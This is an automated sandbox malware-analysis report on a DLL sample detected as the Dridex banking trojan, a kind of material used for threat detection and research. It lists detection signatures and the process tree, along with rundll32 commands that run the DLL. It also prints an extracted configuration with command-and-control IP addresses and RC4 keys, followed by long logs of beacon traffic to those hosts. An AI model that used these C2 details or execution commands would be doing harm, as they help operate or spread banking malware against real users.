Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.Variant.Razy.980776.8232.19927

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.Razy.980776.8232.19927 (renamed file extension from 19927 to dll)
Analysis ID:510689
MD5:6df0687582c592e9860683a68858e082
SHA1:53780def0699c055381746ce4ecebef8f17fd12d
SHA256:90877ec621cc53fc31e693362e3b335a429aecc77abdbfd8b7d5d7493478f36d
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Dridex
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Detected Dridex e-Banking trojan
Found potential dummy code loops (likely to delay analysis)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Program does not show much activity (idle)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6384 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6396 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6424 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6408 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Bluewing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6464 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Earth MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6480 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Masterjust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.467247040.0000000004B00000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
    00000002.00000003.433688939.0000000004C00000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
      00000000.00000002.888568308.000000006EFE1000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
        00000000.00000003.478698643.0000000001270000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
          00000003.00000002.898148863.000000006EFE1000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.3.rundll32.exe.62db55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
              5.3.rundll32.exe.dfdb55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                2.3.rundll32.exe.4c1db55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                  4.3.rundll32.exe.4b1db55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                    3.3.rundll32.exe.62db55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                      Click to see the 7 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 3.2.rundll32.exe.6efe0000.0.unpackMalware Configuration Extractor: Dridex {"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dllReversingLabs: Detection: 18%
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:49749 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.6:50129 version: TLS 1.2
                      Source: SecuriteInfo.com.Variant.Razy.980776.8232.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.906753270.000000006F0A7000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.905694712.000000006F0A7000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.8232.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F00CEF8 FindFirstFileExW,

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 192.46.210.220:443
                      Source: Malware configuration extractorIPs: 143.244.140.214:808
                      Source: Malware configuration extractorIPs: 45.77.0.96:6891
                      Source: Malware configuration extractorIPs: 185.56.219.47:8116
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: KELIWEBIT KELIWEBIT
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4862Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4850Connection: CloseCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 45.77.0.96 45.77.0.96
                      Source: Joe Sandbox ViewIP Address: 185.56.219.47 185.56.219.47
                      Source: global trafficTCP traffic: 192.168.2.6:49748 -> 143.244.140.214:808
                      Source: global trafficTCP traffic: 192.168.2.6:49750 -> 45.77.0.96:6891
                      Source: global trafficTCP traffic: 192.168.2.6:49755 -> 185.56.219.47:8116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50190
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50194
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
